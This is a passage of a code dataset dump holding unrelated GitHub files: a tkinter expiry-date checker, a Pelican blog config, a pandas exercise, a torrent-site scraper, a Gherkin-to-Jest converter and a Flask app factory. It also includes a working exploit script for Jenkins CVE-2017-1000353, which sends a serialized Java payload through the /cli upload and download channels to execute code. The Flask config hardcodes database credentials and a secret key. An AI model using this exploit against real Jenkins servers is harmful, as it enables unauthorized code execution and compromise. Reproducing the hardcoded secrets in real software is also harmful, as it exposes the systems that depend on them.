Tiempo:\n def __init__(self, *arg, **kwargs):\n pass\n\n def formato_fecha(self, fecha):\n if patronfecha.match(fecha):\n dia, mes, año = fecha.split(\"/\")\n if int(año) > 68:\n mb.showerror(\"error\", \"fuera de rango de años (hasta 2068\")\n return\n try:\n fecha = dt.datetime.strptime(fecha, \"%d/%m/%y\")\n except:\n mb.showerror(\"error\", \"el mes tiene menos dias\")\n return\n if fecha < dt.datetime.today():\n mb.showerror(\"error\", \"fecha invalida (pasado)\")\n return\n else:\n try:\n dia, mes, año = fecha.split(\"/\")\n except:\n mb.showerror(\"error\", \"usar formato: dd/mm/aa\")\n return\n if int(dia) > 31:\n mb.showerror(\"error\", \"dias maximos: 31\")\n return\n if int(mes) > 12:\n mb.showerror(\"error\", \"meses maximos: 12\")\n return\n if int(año) > 99:\n mb.showerror(\n \"error\", \"ingresar el año solo con sus ultimos dos digitos\"\n )\n return\n año = int(año)\n if año < 10:\n mb.showerror(\"error\", \"fecha invalida (pasado)\")\n return False\n return True\n\n def cerebro(self, treeb):\n hoy = dt.datetime.now().strftime(\"%d/%m/%y\")\n hoy = dt.datetime.strptime(hoy, \"%d/%m/%y\")\n\n con = BaseDeDatos().conexion()\n cursor = con.cursor()\n sql = \"SELECT * FROM productos\"\n text = cursor.execute(sql)\n valores = text.fetchall()\n fechas = []\n for x in valores:\n fecha = x[3]\n fecha = dt.datetime.strptime(fecha, \"%d/%m/%y\")\n delta = fecha - hoy\n if delta < dt.timedelta(weeks=1):\n fechas = [x]\n if fechas:\n mb.showinfo(\"alerta\", \"vencimientos cerca, presentados en pantalla\")\n for x in fechas:\n treeb.insert(\"\", \"end\", text=x[0], values=(x[1], x[2], x[3]))\n else:\n mb.showinfo(\"\", \"no hay vencimientos cercanos\")\n","repo_name":"sumerlost/app-vencimientos","sub_path":"tiempo.py","file_name":"tiempo.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"23611438640","text":"import functools\n\nimport plural_ru\n\n\nAUTHOR = \"Андрей Семакин\"\nSITENAME = \"Питонические атаки\"\nSITESUBTITLE = \"Про разработку в целом и про Python в частности\"\nSHOW_SOCIAL_ON_INDEX_PAGE_HEADER = True\nSITEURL = \"\"\nSLUGIFY_SOURCE = \"basename\"\nDEFAULT_DATE_FORMAT = (\"ru_RU\", '%d %B %Y, %a')\n\nPATH = \"content\"\nARTICLE_PATHS = [\"blog\"]\nARTICLE_SAVE_AS = \"{date:%Y}/{date:%m}/{slug}/index.html\"\nARTICLE_URL = \"{date:%Y}/{date:%m}/{slug}/\"\n\nPAGE_PATHS = [\"pages\"]\nPAGE_SAVE_AS = \"pages/{slug}/index.html\"\nPAGE_URL = \"pages/{slug}/\"\nDISPLAY_PAGES_ON_MENU = True\n\nSTATIC_PATHS = [\"static\", \"extra\", \"pages\"]\nEXTRA_PATH_METADATA = {\n \"extra/favicon_16.png\": {\"path\": \"favicon_16.png\"},\n \"extra/favicon_24.png\": {\"path\": \"favicon_24.png\"},\n \"extra/favicon_32.png\": {\"path\": \"favicon_32.png\"},\n \"extra/CNAME\": {\"path\": \"CNAME\"},\n \"extra/.nojekyll\": {\"path\": \".nojekyll\"},\n \"extra/README.md\": {\"path\": \"README.md\"},\n \"extra/robots.txt\": {\"path\": \"robots.txt\"},\n}\n\nDEFAULT_CATEGORY = \"blog\"\nDISPLAY_CATEGORIES_ON_MENU = False\nDEFAULT_METADATA = {\n \"status\": \"draft\",\n}\n\nTIMEZONE = \"Asia/Yekaterinburg\"\n\nDEFAULT_LANG = \"ru\"\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Social widget\nSOCIAL = ((\"rss\", \"/feeds/all.atom.xml\"), (\"telegram\", \"https://t.me/pythonic_attacks\"))\n\n# Menu items\nMENUITEMS = [(\"Тэги\", 
\"/tags.html\")]\n\nDEFAULT_PAGINATION = 10\n\n# Uncomment following line if you want document-relative URLs when developing\nRELATIVE_URLS = True\n\nTHEME = \"themes/pelican-clean-blog\"\nCOLOR_SCHEME_CSS = \"monokai.css\"\n\nUTTERANCES_REPO = \"and-semakin/and-semakin.github.io\"\n\nPLUGIN_PATHS = [\"plugins\"]\nPLUGINS = [\"sitemap\", \"filetime_from_git\", \"post_stats\"]\n# disabled plugins:\n# * deadlinks\n\nSITEMAP = {\n \"format\": \"xml\",\n \"priorities\": {\"articles\": 0.5, \"indexes\": 0.5, \"pages\": 0.5},\n \"changefreqs\": {\"articles\": \"monthly\", \"indexes\": \"daily\", \"pages\": \"monthly\"},\n}\n# DEADLINK_VALIDATION = False\n# DEADLINK_OPTS = {\n# \"archive\": True,\n# \"classes\": [],\n# \"labels\": False,\n# \"timeout_duration_ms\": 10000,\n# \"timeout_is_error\": True,\n# }\n\nGIT_FILETIME_FROM_GIT = True\n\nSHOW_READ_TIME = True\nPLURAL_MINUTE = functools.partial(\n plural_ru.ru, quantitative=[\"минута\", \"минуты\", \"минут\"]\n)\n\nDISABLE_CUSTOM_THEME_JAVASCRIPT = False\n\n\ndef sort_by_number_of_articles(tags):\n return sorted(tags, reverse=True, key=lambda tag: len(tag[1]))\n\n\n# Custom filters\nJINJA_FILTERS = {'sort_by_number_of_articles': sort_by_number_of_articles}\n\n# Custom Markdown config.\n# See MARKDOWN here:\n# https://docs.getpelican.com/en/stable/settings.html#basic-settings\nMARKDOWN = {\n 'extension_configs': {\n 'markdown.extensions.codehilite': {'css_class': 'highlight'},\n 'markdown.extensions.meta': {},\n 'pymdownx.extra': {},\n },\n 'output_format': 'html5',\n}\n","repo_name":"and-semakin/blog_source","sub_path":"pelican/pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41265795544","text":"# 2.\n# Напишите скрипт urbanization.py, получающий на вход переменную regions — строку с названиями стран через запятую.\n# Внутри скрипта прочитайте переменную urbanization из файла data/urbanization.csv.\n# Отфильтруйте только страны, указанные во входном параметре, и определите для них максимальный уровень урбанизации за всю историю наблюдений.\n# Формат входного параметра:\n# Unix-имя: r\n# GNU-имя: regions\n# Ваш скрипт вызывается так:\n# python urbanization.py --regions='Germany,France,Russia'\n\n# Подсказка:\n# Проверьте переменные unixOptions и gnuOptions.\n# В блоке обработки параметров конвертируйте строки с именами стран в массив методом split(',').\n\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nimport getopt\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n # Задаём определения входных параметров\n unixOptions = \"r:\" # напишите код\n gnuOptions = [\"regions=\"] # напишите код\n\n # Читаем входные параметры\n fullCmdArguments = sys.argv\n argumentList = fullCmdArguments[1:]\n try:\n arguments, values = getopt.getopt(argumentList, unixOptions, gnuOptions)\n except getopt.error as err:\n print(str(err))\n sys.exit(2)\n\n # Обрабатываем входные параметры\n regions = 'Germany,France,Russia'.split(',')\n for currentArgument, currentValue in arguments:\n if currentArgument in (\"-r\",\"--regions\"): # ваш код здесь\n regions = currentValue.split(',') # ваш код здесь\n\n urbanization = pd.read_csv('/datasets/urbanization.csv')\n\n # Фильтруем и определяем максимальный уровень урбанизации\n urbanization = urbanization.query('Entity in @regions')\n urbanization = urbanization.groupby('Entity').agg({'Urban': 'max'}) # ваш код\n\n 
print(urbanization)","repo_name":"parabatareek/DataAnalyst","sub_path":"Study/Sprint 15 - Автоматизация/1. Основы запуска скриптов/1.2 script_console_start.py","file_name":"1.2 script_console_start.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"45009274978","text":"# Author: Sheikh Rabiul Islam\n# Date: 07/19/2019\n# Purpose: preprocess data by running following 5 files for experiment 1\n# data_merger.py -> merge individual csv files in to a single file following same format (same column structure).\n# data_sampler.py -> sample specified number of records using stratified sampling technique. \n# data_preprocess_all_features.py -> preprocess data using all features, saves fully preprocessed data in binary format (as numpy array with format .npy)\n# data_preprocess_selected_features.py -> preprocess data using selected features, saves fully preprocessed data in binary format (as numpy array with format .npy)\n# data_preprocess_domain_features.py -> preprocess data using domain features, saves fully preprocessed data in binary format (as numpy array with format .npy)\n\t\nimport time\n\nstart = time.time()\nexec(open(\"data_merger.py\").read())\nend = time.time()\nprint(\"Time taken by data_merger.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_sampler.py\").read())\nend = time.time()\nprint(\"Time taken by data_sampler.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_preprocess_all_features.py\").read())\nend = time.time()\nprint(\"Time taken by data_preprocess_all_features.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_preprocess_selected_features.py\").read())\nend = time.time()\nprint(\"Time taken by data_preprocess_selected_features.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_preprocess_domain_features.py\").read())\nend = time.time()\nprint(\"Time taken by data_preprocess_domain_features.py:\", end-start)\n","repo_name":"SheikhRabiul/domain-knowledge-aided-explainable-ai-for-intrusion-detection-and-response","sub_path":"process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"41315748954","text":"from bs4 import BeautifulSoup\nfrom couchpotato.core.helpers.encoding import tryUrlencode, toUnicode\nfrom couchpotato.core.helpers.variable import tryInt\nfrom couchpotato.core.logger import CPLog\nfrom couchpotato.core.providers.torrent.base import TorrentProvider\nimport traceback\nimport re\n\nlog = CPLog(__name__)\n\n\nclass TehConnection(TorrentProvider):\n\n urls = {\n 'test': 'https://tehconnection.eu/',\n 'login': 'https://tehconnection.eu/login.php',\n 'login_check': 'https://tehconnection.eu/index.php',\n 'detail': 'https://tehconnection.eu/details?id=%s',\n 'search': 'https://tehconnection.eu/torrents.php?action=advanced&%s',\n 'download': 'https://tehconnection.eu%s',\n }\n\n http_time_between_calls = 1 #seconds\n\n def _search(self, movie, quality, results):\n\n # need to try logging in before every search\n if not '/logout.php' in self.urlopen(self.urls['login'], data = self.getLoginParams()).lower():\n log.info('problems logging into tehconnection.eu')\n return []\n\n data = self.getHTMLData(self.urls['search'] % tryUrlencode({'torrentname': '%s' % movie['library']['identifier'],'order_by': 's3'}))\n if data:\n try:\n resultsTable = BeautifulSoup(data).find('table', attrs = {'id' : 
'browse_torrent_table'})\n if resultsTable is None:\n log.info('movie not found on TehConnection')\n return []\n year = resultsTable.find('font', attrs = {'class' : 'subtext'}).find('a')\n title_div = resultsTable.find('div', attrs = {'class' : 'torrent_title'}).find('a')\n id = title_div['href'].replace('/torrents.php?id=', '')\n releases = resultsTable.find_all('tr', attrs = {'class' : \"groupid_%s\" % (id) })\n\n for result in releases:\n log.info('teh connection found ' + re.sub(\"\\s+\" , \" \",re.sub(r'<.*?>', '','%s (%s) %s' % (title_div.string, year.string, unicode(result.find_all('td')[1].find_all('a')[2])))))\n results.append({\n\t\t\t 'leechers': result.find_all('td')[7].string, \n\t\t\t 'seeders': result.find_all('td')[6].string, \n\t\t\t 'name': re.sub(\"\\s+\" , \" \",re.sub(r'<.*?>', '','%s (%s) %s' % (title_div.string, year.string, unicode(result.find_all('td')[1].find_all('a')[2])))), \n\t\t\t 'url': self.urls['download'] % result.find('a', attrs = {'title' : 'Download'})['href'].replace('amp;',''), \n\t\t\t 'detail_url': self.urls['download'] % result.find('a', attrs = {'title' : 'Download'})['href'].replace('amp;',''), \n\t\t\t 'id': '%s %s' % (id,self.parseSize(result.find_all('td')[4].string)), \n\t\t\t 'size': self.parseSize(result.find_all('td')[4].string)\n })\n\n except:\n log.error('Failed getting results from %s: %s', (self.getName(), traceback.format_exc()))\n\n def getLoginParams(self):\n return {\n 'username': self.conf('username'),\n 'password': self.conf('password'),\n 'submit': 'Log In!',\n }\n\n def loginSuccess(self, output):\n return True\n","repo_name":"Kopoe2003/CouchPotatoTehConnectionPlugin","sub_path":"couchpotato/core/providers/torrent/tehconnection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15676839747","text":"import sys\nsys.path.insert(0, 'C:\\\\Users\\\\Utente\\\\Desktop\\\\Dev\\\\Progetti\\\\OrderAi\\\\lib\\\\')\nfrom stats import *\n\ndef run_model(data, model):\n k = 0\n for data in data.as_numpy_iterator():\n X_train, XN_train, y_train, X_test, XN_test, y_test = data\n model.run(X_train, X_test, XN_train, XN_test, tf.squeeze(y_train), tf.squeeze(y_test), k)\n write_stats(X_train.shape[0]+X_test.shape[0], X_train.shape[1], model.loss_history[-1], epochs, lr, batch_size, kk, model.r2_accuracy_tt[-1].numpy(), model.train_mse.result().numpy(), model.test_mse.result().numpy(), model.train_mae.result().numpy(), model.test_mae.result().numpy(), model.residual_tr[-1].numpy(), model.residual_tt[-1].numpy())\n k = k+1 \n break\n return X_train, X_test, XN_train, XN_test, tf.squeeze(y_train), tf.squeeze(y_test)\n ","repo_name":"cecinuga/MarketAI","sub_path":"lib/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29533726385","text":"\"\"\"\nAuthor: Gabriel Chicote\n\"\"\"\nfrom typing import Dict, List\nfrom pathlib import Path\nimport argparse, sys, os\n\n# Create the parser\nparser = argparse.ArgumentParser(\n\t\tdescription='Parse files from [.feature] format into [.e2e.js] format' )\n\n# Define parser version\nparser.version = 'Feature parser. 
version: 1.0'\n\n# Add the arguments\nparser.add_argument('Path',\n\t\t\t\t\tmetavar='path',\n\t\t\t\t\ttype=Path,\n\t\t\t\t\tnargs='+',\n\t\t\t\t\thelp='Path to work with')\nparser.add_argument('-d',\n\t\t\t\t\t'--dir',\n\t\t\t\t\taction='store_true',\n\t\t\t\t\tdest='directory',\n\t\t\t\t\thelp='parses all files in specified directory')\nparser.add_argument('-V',\n\t\t\t\t\t'--version',\n\t\t\t\t\taction='version',\n\t\t\t\t\thelp='shows CLI version')\n\n# Execute parse_args()\nargs = parser.parse_args()\n\n\ndef insert_header(output_file: str) -> None:\n\t\"\"\" Escribe en el archivo de salida un header y el import por default.\n\t\"\"\"\n\n\toutput_file.write( \"/*\\n * Author: Gabriel Chicote\\n */\\n\" )\n\toutput_file.write( \"\\n// Add corresponding imports. Example:\\nimport { describe } from 'jest-circus';\\n\" )\n\toutput_file.write('\\n')\n\n\ndef insert_feature_desc(output_file: str, feature: str, user_story: str) -> None:\n\t\"\"\" Escribe en el archivo de salida la descripcion del feature y las dos\n\tfunciones por default para todos los archivos de test.\n\t\"\"\"\n\n\toutput_file.write( f\"describe( '{user_story} - {feature}', () => {'{'}\\n\\n\" )\n\toutput_file.write( \"\\tbeforeAll( () => {\\n\\t\\tawait device.launchApp();\\n\\t} );\\n\\n\" )\n\toutput_file.write( \"\\tbeforeEach( () => {\\n\\t\\tawait device.reloadReactNative();\\n\\t} );\\n\\n\" )\n\n\ndef format_scenario(dicc: Dict[str, str]) -> str:\n\t\"\"\" Toma un diccionario de pares , formatea un\n\tstep definition a partir del mismo y lo devuelve como cadena.\n\t\"\"\"\n\n\tstr = '''\n\tdescribe( '{}', () => {{ \n\n\t\tconst given = '{}'\n\t\tconst when = '{}'\n\t\tconst then = '{}'\n\n\t\ttest( `${{given}}, ${{when}} ${{then}}`, async () => {{ \n\t\t\t// TODO\n\t\t}})\n\n\t}} ); \n\t'''.format(dicc['scenario'], dicc['given'], dicc['when'], dicc['then'])\n\treturn str\n\t\n\ndef insert_scenario(parts: Dict[str, str], output_file: str) -> None:\n\t\"\"\" Inserta un escenario, previamente formateado por 'format_scenario()',\n\ten el archivo de salida.\n\t\"\"\"\n\n\toutput_file.write(format_scenario(parts))\n\n\ndef write_file(lines: List[str], output_file: str) -> None:\n\t\"\"\" Recorre y parsea las lineas del file, y escribe el resultado en el \n\toutput file cuando corresponda.\n\t\"\"\"\n\n\tfeature = \"\"\n\tuser_story = \"\"\n\tparts = { 'scenario': \"\"\n\t\t\t, 'given': \"\"\n\t\t\t, 'when': \"\"\n\t\t\t, 'then': \"\"\n\t}\n\n\twith open(output_file, 'w') as f:\n\t\t# File header\n\t\tinsert_header(f)\n\n\t\tfor i in range(0, len( lines )):\n\t\t\tl = lines[i].split()\n\t\t\tif \"Feature\" in l[0]:\n\t\t\t\tfeature = ' '.join( l[1:] )\n\t\t\telif \"US\" in l[0]:\n\t\t\t\tuser_story = l[0][:-1]\n\t\t\t\tinsert_feature_desc(f, feature, user_story)\n\t\t\telif \"Scenario\" in l[0]:\n\t\t\t\tparts['scenario'] = ' '.join( l[1:] )\n\t\t\telif \"Given\" in l[0]:\n\t\t\t\tparts['given'] = ' '.join( l )\n\t\t\telif \"When\" in l[0]:\n\t\t\t\tparts['when'] = ' '.join( l )\n\t\t\telif \"Then\" in l[0]:\n\t\t\t\tparts['then'] = ' '.join( l )\n\t\t\t\tinsert_scenario(parts, f)\n\t\t\t\tparts = parts.fromkeys(parts, \"\")\n\n\t\t# Llave y parentesis finales.\n\t\tf.write(\"\\n});\\n\") \n\n\ndef prepare_input_file(input_file: str, output_file: str) -> None:\n\t\"\"\" Abre el archivo de lectura limpia las lineas que se van a usar y\n\tdelega el trabajo de parseo y insertado a 'parse_lines()'\n\t\"\"\"\n\n\twith open(input_file, 'r') as f:\n\t\twrite_file(\n\t\t\tlist(filter( lambda x: x != '' , map(str.strip, 
f.readlines()))),\n\t\t\toutput_file\n\t\t)\n\n\ndef prepare_output_file(input_file: str, output_dir: str) -> None:\n\t\"\"\" Crea y guarda un archivo de salida para el archivo de entrada.\n\t\"\"\"\n\n\tn = 0\n\toutput_file_name = \"{}{}.e2e.js\"\n\n\twhile (\n\t\tos.path.isfile(\n\t\t\tos.path.join(\n\t\t\t\toutput_dir,\n\t\t\t\toutput_file_name.format(\n\t\t\t\t\tos.path.basename(input_file).split('.')[0],\n\t\t\t\t\t'' if n == 0 else '_{}'.format(n)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t):\n\t\tn += 1\n\toutput_path = os.path.join( output_dir, output_file_name.format( os.path.basename(input_file).split('.')[0], '' if n == 0 else '_{}'.format(n) ) )\n\tprepare_input_file( input_file, output_path )\n\n\ndef parse_n_files(paths: List[str] ) -> None:\n\t\"\"\" Crea y guarda un archivo final para cada archivo parametro.\n\t\"\"\"\n\n\toutput_dir = create_dir( os.path.split(str(paths[0]))[0] ) \n\tfor file_path in paths:\n\t\tprepare_output_file( file_path, output_dir )\n\n\ndef parse_all_files_in_dir(dir: str) -> None:\n\t\"\"\" Crea y guarda un archivo final para cada archivo del directorio dado.\n\t\"\"\"\n\n\toutput_dir = create_dir(dir)\n\tfiles = filter(\n\t\t\t\tlambda f: os.path.isfile(f) and os.path.basename(f).startswith(\"US\") and os.path.basename(f).endswith(\".feature\"),\n\t\t\t\tmap( lambda x: os.path.join(dir, x), os.listdir(dir) )\n\t\t\t)\n\tfor file in files:\n\t\tprepare_output_file( file, output_dir )\n\n\ndef create_dir(dir: str) -> None:\n\t\"\"\" Crea el directorio 'step_definitions' si este no existe.\n\t\"\"\"\n\n\toutput_dir = 'step_definitions'\n\tif not os.path.exists(os.path.join(dir, output_dir)):\n\t\tos.mkdir( os.path.join(dir, output_dir) )\n\treturn os.path.join(dir, output_dir)\n\n\n\ndef main() -> None:\n\n\tif args.directory:\n\t\tif not os.path.isdir( args.Path[0] ):\n\t\t\tsys.exit(f\"Error! {args.Path} is not a directory.\")\n\t\telif len( args.Path ) > 1:\n\t\t\tsys.exit(f\"Error! Only one directory is accepted.\")\n\t\tparse_all_files_in_dir( args.Path[0] )\n\telse:\n\t\tfor file in args.Path:\n\t\t\tif not os.path.isfile( file ):\n\t\t\t\tsys.exit(f\"Error! 
{file} is not a file.\")\n\t\tparse_n_files( args.Path )\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"GChicote/feature_parser","sub_path":"feature_parser.py","file_name":"feature_parser.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"32404427132","text":"import collections\nfrom typing import List\n\n\nclass Solution:\n def isPossibleDivide(self, nums: List[int], k: int) -> bool:\n count = collections.Counter(nums)\n keys = list(count.keys())\n keys.sort()\n for n in keys:\n if count[n] > 0:\n minus = count[n]\n for i in range(n, n + k):\n if count[i] < minus:\n return False\n count[i] -= minus\n return True\n\n\nif __name__ == '__main__':\n nums = [1, 2, 3, 3, 4, 4, 5, 6]\n k = 4\n solution = Solution()\n result = solution.isPossibleDivide(nums, k)\n print(result)\n","repo_name":"sudhirsinghshekhawat/problem_solving","sub_path":"leetcode/posibleconsecutive.py","file_name":"posibleconsecutive.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71023217117","text":"import urllib\nimport sys\nimport requests\nimport uuid\nimport threading\nimport time\nimport gzip\nimport urllib3\nimport zlib\n\nproxies = {\n# 'http': 'http://127.0.0.1:8085',\n# 'https': 'http://127.0.0.1:8090',\n}\n\nURL = '%s/cli' % sys.argv[1].rstrip('/')\n\nPREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='\nPROTO = b'\\x00\\x00\\x00\\x00'\n\nwith open(sys.argv[2], \"rb\") as f:\n FILE_SER = f.read()\n\ndef download(url, session):\n\n headers = {'Side' : 'download'}\n headers['Content-type'] = 'application/x-www-form-urlencoded'\n headers['Session'] = session\n headers['Transfer-Encoding'] = 'chunked'\n r = requests.post(url, data=null_payload(), headers=headers, proxies=proxies, stream=True, verify=False)\n print(r.content)\n\n\ndef upload(url, session, data):\n\n headers = {'Side' : 'upload'}\n headers['Session'] = session\n headers['Content-type'] = 'application/octet-stream'\n headers['Accept-Encoding'] = None\n r = requests.post(url,data=data,headers=headers,proxies=proxies, verify=False)\n\n\ndef upload_chunked(url,session, data):\n\n headers = {'Side' : 'upload'}\n headers['Session'] = session\n headers['Content-type'] = 'application/octet-stream'\n headers['Accept-Encoding']= None\n headers['Transfer-Encoding'] = 'chunked'\n headers['Cache-Control'] = 'no-cache'\n\n r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies, verify=False)\n\n\ndef null_payload():\n yield b\" \"\n\ndef create_payload():\n payload = PREAMLE + PROTO + FILE_SER\n\n return payload\n\ndef create_payload_chunked():\n yield PREAMLE\n yield PROTO\n yield FILE_SER\n\ndef main():\n print(\"start\")\n\n session = str(uuid.uuid4())\n\n t = threading.Thread(target=download, args=(URL, session))\n t.start()\n \n time.sleep(2)\n print(\"pwn\")\n #upload(URL, session, create_payload())\n\n upload_chunked(URL, session, \"asdf\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"DawnFlame/POChouse","sub_path":"Jenkins/Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)/CVE-2017-1000353.py","file_name":"CVE-2017-1000353.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":896,"dataset":"github-code","pt":"50"} +{"seq_id":"37664154543","text":"from random import 
randint\n\nfrom pymetaheuristics.genetic_algorithm.model import GeneticAlgorithm\n\nitems = [\n [25, 1.2],\n [40, 7.6],\n [10, 2.5],\n [17, 1.5],\n [42, 1.1],\n [29, 3.1],\n [14, 0.5],\n [36, 3.5],\n]\n\n\ndef genome_generator():\n genome = list()\n for _ in range(len(items)):\n genome.append(randint(0, 1))\n return genome\n\n\ndef fitness_function(genome):\n score = 0\n for i, digit in enumerate(genome):\n score += digit * items[i][1]\n return score * -1\n\n\ndef maximun_capacity(genome):\n weight = 0\n for i, digit in enumerate(genome):\n weight += digit * items[i][0]\n return weight <= 100\n\n\nmodel = GeneticAlgorithm(\n genome_generator=genome_generator,\n fitness_function=fitness_function\n)\n\nmodel.add_constraint(maximun_capacity)\n\nresult = model.train(30, 10, k=5, verbose=True)\n\nprint(\"Genetic Algorithm result\", result, sep=\"\\n\")\nprint(\"Ground Truth\", ([0, 1, 1, 1, 0, 1, 0, 0], -14.7), sep=\"\\n\")\n\nans = (14.7 - abs(round(result[1], 2))) / 14.7\nprint(round(ans*100, 2), \"%... off the optimal\")\n","repo_name":"igormcsouza/pymetaheuristics","sub_path":"tests/genetic_algorithm/integration/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"36072457414","text":"import time\nfrom l05.l05_u5 import Bod2G\n\n\nclass Bod2GG(Bod2G):\n def __init__(self, x, y, vx, vy):\n super().__init__(x, y, vx, vy)\n\n def __str__(self):\n return super().__str__()\n\n def __eq__(self, other):\n return super().__eq__(other)\n\n def krok(self):\n if abs(self.y) - abs(self.vy) <= 0:\n temp_y = -self.y\n temp_vy = self.vy\n self.vy = temp_y\n super().krok()\n self.vy = abs(temp_vy) - abs(temp_y)\n super().krok()\n else:\n super().krok()\n\n\nb = Bod2GG(0.0, 100.0, 0.0, 50.0)\nt = 0\nprint(\"t[s] x[m] y[m] vx[m/s] vy[m/s]\")\nprint(t, b)\n\nwhile True:\n b.krok()\n t += 1\n print(t, b)\n time.sleep(1)\n","repo_name":"samtaborsky/slo-uprog1","sub_path":"l06/l06_u4.py","file_name":"l06_u4.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74799592155","text":"import torch\nfrom lib import svp, svp_newton\n\ntorch.random.manual_seed(123)\nM = 100\nN = 200\nC = 3\nrank = 10\n\ngt = torch.rand((C, M, N))\nU, S, Vh = torch.linalg.svd(gt,full_matrices=False)\nS[:, rank:] = 0\ngt = U @ torch.diag_embed(S) @ Vh\n\nindices = torch.randperm(M * N)[: int(0.6 * M * N)] # 20% elements are observed\nmask = torch.zeros(M * N, dtype=torch.int32)\nmask[indices] = 1\nmask = mask.reshape([M, N])\nobserved_matrix = mask[None] * gt\n\nproblem = dict(\n channel = 1,\n size=[M, N],\n gt=gt,\n rank=rank,\n observed_matrix=observed_matrix,\n mask=mask,\n method=svp_newton,\n # method=svp,\n step=1,\n tol=1e-4,\n device=\"cuda:0\"\n)\n\ndel(torch)","repo_name":"xuan-li/270A-Project","sub_path":"example/random_matrix.py","file_name":"random_matrix.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39560182292","text":"from pprint import pprint\nimport sys,os,inspect\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nsys.path.insert(0, current_dir) \nfrom flask_sqlalchemy import SQLAlchemy\nimport flask\nfrom flask_migrate import Migrate,MigrateCommand\nfrom flask_script import Manager\nfrom flask_login import LoginManager\nfrom 
dashboards.dashapp1 import Dash_app\nfrom dashboards.dashapp2 import Dash_app2\n\n# from Dashboards import DashApp1\nclass Config:\n\tSECRET_KEY = 'asdwer43f5t65yuhrgefw'\n\t# server \n# \tSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://kooka2:1@localhost:3306/test2'\n\tSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:1@localhost:27017/gshop'\n\tSQLALCHEMY_TRACK_MODIFICATIONS = True\n\t# UPLOAD_FOLDER = '/media/alex/Data1/two/YAPI3/app/DashRoutes/csv_files'\n\tSEND_FILE_MAX_AGE_DEFAULT = 0\n\nclass App:\n\tdef __init__(self):\n\t\tself.flask = flask \n\t\tself.app = self.flask.Flask(__name__, static_folder='home/static',template_folder = 'home/templates')\n\t\tself.app.config.from_object(Config)\n\t\tself.db = SQLAlchemy(self.app)\n\n\tdef register_blueprints(self):\n\t\tfrom avtoshop.routes import avtoshop\n\t\tfrom evernote.routes import evernote\n\t\tfrom rueng.routes import rueng\n\t\tfrom yapi.routes import yapi\n\t\tfrom settings.routes import settings\n\t\tfrom home.routes import home\n\t\tfrom dashroutes.routes import dashroute\n\t\tself.app.register_blueprint(yapi,url_prefix='/yapi')\n\t\tself.app.register_blueprint(avtoshop,url_prefix='/avtoshop')\n\t\tself.app.register_blueprint(evernote,url_prefix='/evernote')\n\t\tself.app.register_blueprint(rueng,url_prefix='/rueng')\n\t\tself.app.register_blueprint(home,url_prefix='/')\n\t\tself.app.register_blueprint(settings,url_prefix='/settings')\n\t\tself.app.register_blueprint(dashroute,url_prefix='/DashExample')\n\t\tDash_app(self.app).get_dash_app()\n\t\tDash_app2(self.app).get_dash_app()\n\n\t\t# DashApp1.Add_Dash(self.app)\n\n\tdef login_manager(self):\n\t\tlogin_manager = LoginManager()\n\t\tlogin_manager.init_app(self.app)\n\t\tlogin_manager.login_view = 'login'\n\t\treturn login_manager\n\n\tdef migrate(self):\n\t\tmigrate = Migrate(self.app,self.db)\n\t\tmanager = Manager(self.app)\n\t\tmanager.add_command('db',MigrateCommand)\n\t\treturn manager\n\t\t\n\tdef get_app(self):\n\t\treturn self.app\n\n\tdef get_db(self):\n\t\treturn self.db\n\n\tdef get_flask(self):\n\t\treturn 